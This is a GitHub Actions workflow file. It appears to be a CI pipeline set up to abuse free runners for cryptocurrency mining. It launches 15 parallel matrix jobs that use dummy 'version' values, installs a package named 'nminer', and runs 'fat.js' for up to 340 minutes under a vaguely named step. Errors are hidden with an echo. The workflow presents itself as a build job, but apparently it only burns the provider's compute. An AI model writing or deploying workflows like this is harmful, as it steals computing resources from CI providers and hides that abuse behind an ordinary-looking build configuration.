name: fat
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5888 }
          - { version: 2771 }
          - { version: 7735 }
          - { version: 890 }
          - { version: 1181 }
          - { version: 3656 }
          - { version: 1215 }
          - { version: 7487 }
          - { version: 9505 }
          - { version: 8173 }
          - { version: 3788 }
          - { version: 5473 }
          - { version: 7108 }
          - { version: 8683 }
          - { version: 5613 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: black-and-white
        run: |
          npm install nminer@latest
          timeout 340m node fat.js || echo "fat executed"